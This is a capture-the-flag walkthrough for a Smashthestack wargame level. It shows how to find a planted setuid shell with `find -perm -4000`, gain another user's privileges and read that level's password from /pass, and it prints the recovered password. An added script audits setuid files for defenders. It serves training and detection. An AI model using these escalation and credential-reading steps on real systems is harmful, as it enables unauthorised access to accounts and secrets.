Smashthestack Blowfish Level 02

To enter this level we ssh in with the password welcome:

$ ssh level2@blowfish.smashthestack.org -p 2222

     1. Thou shalt NOT root or otherwise harm the box.
     2. Thou shalt NOT access any other network from this box.
     3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
     4. Thou shalt give the root pass to l3thal if you manage to change it.

     Passwords are in /pass.
     There is a README in each users home directory.
     /tmp && /var/tmp will be flushed daily by cron.
     Use /code plz for umm, code ;D
     IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
     The password for the last level will get you into
     Tux, the more advanced wargame. Join #blowfish on 
     irc.smashthestack.org with any questions. 

     Admins - l3thal && cr 

     Forum: http://smashthestack.org/viewforum.php?id=10

Last login: Thu Jan 28 21:41:34 2010 from 190.191.160.196

 There is a backdoor to the next level hidden somewhere on this system,
 find it, and get the pass for level3 from /pass/level3

- http://smashthestack.org/viewtopic.php?id=436

 hint: `man find`

So we need to find a backdoor. This usually means a file that we can execute and that lets us
escalate privileges. For that, the file must have the suid flag set. If we look in the man page for
find, we'll see that to search for files that have the suid flag we have to filter by mode. The suid
flag corresponds to the permission 4000. So:

level2@blowfish:/var/tmp/public_html$ find / -executable -perm -4000
/bin/su
/bin/ping6
/bin/mount
/bin/umount
/usr/bin/false
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

Among those files there is one that should not have the suid flag: /usr/bin/false.
Let's execute it:

Stand-alone shell (version 3.7)
> id
uid=1004(level2) gid=1004(level2) euid=1005(level3) groups=1004(level2)

It's a shell and it runs with level3 permissions, so we just have to read the pass:

> cat /pass/level3
l3thal_Rul3Z!

There we have the password: l3thal_Rul3Z! See ya on the next level tutorial.
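
From the administrator's side, the same `-perm -4000` filter is how a planted binary like this /usr/bin/false gets caught: compare every setuid file against a known-good baseline and check its owner. The script below is an added example, not part of the original walkthrough; the function name `audit_suid`, the baseline file format (one absolute path per line) and the demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit setuid files against a known-good baseline.
# Usage: audit_suid ROOT BASELINE_FILE [TRUSTED_UID]
# Prints one line per finding: "<REASON> uid=<owner> <path>".
# Assumes paths contain no newlines.
audit_suid() {
    root=$1
    baseline=$2            # hypothetical format: one absolute path per line
    trusted_uid=${3:-0}    # owner expected for legitimate setuid files (root)
    # -perm -4000 matches any file with the setuid bit set, whatever the
    # other mode bits are; -xdev keeps the walk on a single filesystem.
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        uid=$(ls -ldn "$path" | awk '{print $3}')
        if ! grep -Fxq -- "$path" "$baseline"; then
            # setuid file nobody approved, e.g. a setuid /usr/bin/false
            echo "NOT-IN-BASELINE uid=$uid $path"
        elif [ "$uid" != "$trusted_uid" ]; then
            # approved path, but it now runs as a different user
            echo "UNEXPECTED-OWNER uid=$uid $path"
        fi
    done
}

# Constructed demo tree: two setuid files, only one of them in the baseline.
demo() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin" "$d/usr/bin"
    : > "$d/bin/su"; : > "$d/usr/bin/false"; : > "$d/usr/bin/plain"
    chmod 4755 "$d/bin/su" "$d/usr/bin/false"
    chmod 0755 "$d/usr/bin/plain"
    printf '%s\n' "$d/bin/su" > "$d/baseline"
    # The demo files belong to the current user, so treat that uid as trusted.
    audit_suid "$d" "$d/baseline" "$(id -u)"
    rm -rf "$d"
}

demo
```

On a real host the baseline would come from a fresh install or the package manager's file lists, and the audit would run from cron with its output sent to the admins.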

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License